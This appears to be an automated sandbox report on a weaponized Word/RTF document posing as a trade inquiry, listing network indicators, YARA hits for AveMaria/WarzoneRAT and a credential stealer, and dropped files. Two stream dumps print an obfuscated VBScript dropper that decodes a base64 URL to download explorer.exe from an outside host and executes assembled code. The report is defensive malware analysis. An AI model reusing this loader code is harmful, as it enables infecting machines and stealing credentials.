Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud

barindex
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725425945/\x1Ole10Native' : :....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT..... ...C:\9jkepaD\DZdtfhgYgeghD{.scT.s....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "ex" + "ecute(var1)"..
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725426018/\x1Ole10Native' : ;....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT.....6...C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{.scT.w:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "e
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Jump to dropped file
Source: DZdtfhgYgeghD{.scT Static RTF information: Object: 0 Offset: 000007D1h DZdtfhgYgeghD{.scT
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001900C8 8_2_001900C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197650 8_2_00197650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197219 8_2_00197219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197228 8_2_00197228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_00197640 8_2_00197640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_001907EE 8_2_001907EE
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_0131A760 8_2_0131A760
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_01310048 8_2_01310048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_05890048 8_2_05890048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B00C8 20_2_002B00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7650 20_2_002B7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7228 20_2_002B7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7219 20_2_002B7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B7640 20_2_002B7640
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_002B07E0 20_2_002B07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E09850 20_2_04E09850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00042 20_2_04E00042
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_04E00048 20_2_04E00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00048 20_2_05F00048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F00038 20_2_05F00038
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F00C8 29_2_001F00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7650 29_2_001F7650
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7219 29_2_001F7219
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F7228 29_2_001F7228
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_001F07E0 29_2_001F07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01329850 29_2_01329850
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_01320048 29_2_01320048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500048 29_2_05500048
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05500006 29_2_05500006
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: explorer[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: explorer.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eDdYRRbouy.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 77740000 page execute and read and write
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
